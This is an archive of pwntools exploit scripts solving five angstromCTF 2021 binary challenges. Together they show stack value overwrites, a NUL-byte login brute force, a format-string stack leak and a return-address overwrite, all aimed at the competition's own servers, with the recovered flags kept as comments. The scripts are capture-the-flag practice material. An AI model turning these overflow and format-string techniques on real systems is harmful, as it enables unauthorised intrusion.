ANGSTROM 21 PWN SCRIPTS (solved the four easy ones; also saving here the other challenges I worked on that were eventually solved by the other pwn players from ARESx)
from pwn import *

#: CONNECT TO CHALLENGE SERVERS
# Challenge binary; checksec output is suppressed to keep the log short.
binary = ELF('./raiid_shadow_legends', checksec = False)
#libc = ELF('./libc.so.6', checksec = False)
# Local alternatives kept for debugging (plain, or with the bundled libc preloaded):
#p = process('./raiid_shadow_legends')
#p = process('./raiid_shadow_legends', env = {'LD_PRELOAD' : libc.path})
p = remote("shell.actf.co", 21300)

#: GDB SETTINGS
# Breakpoints for the (commented-out) gdb attach below; the offsets are
# inside the binary's play / terms_and_conditions routines.
breakpoints = [
    'break *play',
    'break *terms_and_conditions',
    'break *play + 493',
    'break *play + 178',
]
#gdb.attach(p, gdbscript = '\n'.join(breakpoints))
#: EXPLOIT INTERACTION STUFF | |
def game_choice(choice):
    """Wait for the game's menu prompt, echo it, then send the menu number.

    Args:
        choice: the menu entry to pick; it is passed through ``str()`` before
            being sent, so an int is fine.

    Uses the module-level tube ``p``.
    """
    prompt = p.recvuntil(b'do? ')
    print(prompt)          # echoed so the transcript shows what was answered
    p.sendline(str(choice))
def send_condition(agreement):
    """Answer the prompt ending in ``conditions? `` with ``agreement``.

    ``agreement`` may be ``str`` or ``bytes``; it is forwarded unchanged to
    the module-level tube ``p``.
    """
    reply = agreement
    p.sendlineafter(b'conditions? ', reply)
def send_signature(sign):
    """Send ``sign`` as the reply to the prompt ending in ``here: ``.

    Forwarded unchanged to the module-level tube ``p``.
    """
    reply = sign
    p.sendlineafter(b'here: ', reply)
def send_name(name):
    """Send ``name`` as the reply to the prompt ending in ``name: ``.

    Forwarded unchanged to the module-level tube ``p``.
    """
    reply = name
    p.sendlineafter(b'name: ', reply)
#: PWN THY VULNS | |
#: PWN THY VULNS
# Reply for the first conditions prompt: 4 bytes of cyclic filler followed
# by the 64-bit value 1337.  Which field the extra bytes land on is not
# visible in this script; the breakpoints above are how it was worked out.
FILLER = cyclic(4)
CONDITION_PAYLOAD = FILLER + p64(1337)
SIGNATURE = 'SIGNATURE'
NAME = '_blackb3ard'

# The exchange order below is the protocol; it must not be reordered.
game_choice(1)
send_condition(CONDITION_PAYLOAD)
send_condition('yes')
send_signature(SIGNATURE)
send_name(NAME)
game_choice(2)
p.interactive()
#: actf{great_job!_speaking_of_great_jobs,_our_sponsor_audible...}
from pwn import *

#: CONNECT TO CHALLENGE SERVERS
binary = ELF('./checks', checksec = False)
#libc = ELF('./libc.so.6', checksec = False)
#p = process('./checks')
#p = process('./checks', env = {'LD_PRELOAD' : libc.path})
p = remote("shell.actf.co", 21303)

#: GDB SETTINGS
breakpoints = ['break *main + 159']
#gdb.attach(p, gdbscript = '\n'.join(breakpoints))

#: EXPLOIT INTERACTION STUFF
#: PWN THY VULNS
# Single-line input: the NUL-terminated password, filler, then five 32-bit
# values.  Per the summary below these presumably overwrite the stack
# values the binary compares; the exact locals are not visible here.
password = b"password123\x00"
padding = cyclic(80 - (2 * 8))      # 64 bytes between the password and the values
checked_values = (17, 61, 245, 55, 50)
exploit = password + padding + b"".join(p32(v) for v in checked_values)
p.sendline(exploit)
p.interactive()
#: Challenge summary: control values in the stack to pass checks
#: actf{if_you_aint_bout_flags_then_i_dont_mess_with_yall}
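from pwn import *

#: CONNECT TO CHALLENGE SERVERS
binary = ELF('./login', checksec = False)
#libc = ELF('./libc.so.6', checksec = False)

#: PWN THY VULNS
context.log_level = 'error'   # 1000 process spawns would otherwise flood the log

# Run the binary repeatedly, feed it one NUL byte each time, and print
# whatever it writes back.  Nothing filters the output and the loop never
# stops early, so all 1000 results are printed.
for i in range(1000):
    # ``with`` closes the child even when recvall() raises, so a failing
    # iteration does not leave a stray process behind (the original only
    # closed on the success path).
    with process('./login') as p:
        p.sendline('\x00')
        print(i, p.recvall())
#: actf{if_youre_reading_this_ive_been_hacked}
#: JUST BRUTEFORCE AND SEND NULL BYTE TO THE SHELL SERVER
#: https://ctftime.org/writeup/24905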
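from pwn import *
from Crypto.Util.number import long_to_bytes, bytes_to_long   # unused below; kept as in the original

#: CONNECT TO CHALLENGE SERVERS
binary = ELF('./stickystacks', checksec = False)
#libc = ELF('./libc.so.6', checksec = False)

#: GDB SETTINGS
breakpoints = ['break *vuln + 527']
#gdb.attach(p, gdbscript = '\n'.join(breakpoints))

#: EXPLOIT INTERACTION STUFF
context.log_level = 'error'

#: PWN THY VULNS
def _word_to_bytes(leaked):
    """Convert one ``%N$p`` reply (``b'0x...'``) into its little-endian bytes.

    The original did ``bytes.fromhex(hex(v)[2:])[::-1]``, which raises
    ``ValueError`` whenever ``hex()`` yields an odd number of digits (i.e.
    the top byte is below 0x10).  Going through ``int.to_bytes`` produces
    the same bytes for every even-length value and also handles the
    odd-length case; leading zero bytes are dropped either way, as before.
    ``int()`` accepts bytes directly, so no ``decode()`` is needed.
    """
    value = int(leaked, 16)
    return value.to_bytes((value.bit_length() + 7) // 8, 'little')

flag = b''
for i in range(33, 42):
    # A fresh connection per offset, as in the original; ``with`` closes it
    # even if the reply cannot be parsed.
    with remote("shell.actf.co", 21820) as p:
        p.sendline(f"%{i}$p")
        leaked = p.recvall().split(b'Welcome, ')[1].strip()
    flag += _word_to_bytes(leaked)
#: offset 42, which for some reason I can't parse properly
#: i'm too lazy to do it
# NOTE(review): the odd-length-hex failure fixed in _word_to_bytes may be
# what broke offset 42 — unverified; the hard-coded tail is kept as the
# author left it.
flag += bytes.fromhex("7d333935663161")[::-1]
print(flag)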
from pwn import *

#: CONNECT TO CHALLENGE SERVERS
binary = ELF('./tranquil', checksec = False)
#libc = ELF('./libc.so.6', checksec = False)
#p = process('./tranquil')
#p = process('./tranquil', env = {'LD_PRELOAD' : libc.path})
p = remote("shell.actf.co", 21830)
banner = p.recvuntil(b'word: ')   # consume everything up to the password prompt
print(banner)

#: GDB SETTINGS
breakpoints = ['break *vuln + 92']
#gdb.attach(p, gdbscript = '\n'.join(breakpoints))

#: EXPLOIT INTERACTION STUFF
#: PWN THY VULNS
# Reply layout: NUL-terminated password, 60 bytes of cyclic filler, then the
# 64-bit value 0x401196.  The flag text suggests this lands on the saved
# instruction pointer; the breakpoint above is where to confirm it.
password = b"password123\x00"
filler = cyclic(60)
target = p64(0x401196)
p.sendline(password + filler + target)
p.interactive()
#: actf{time_has_gone_so_fast_watching_the_leaves_fall_from_our_instruction_pointer_864f647975d259d7a5bee6e1}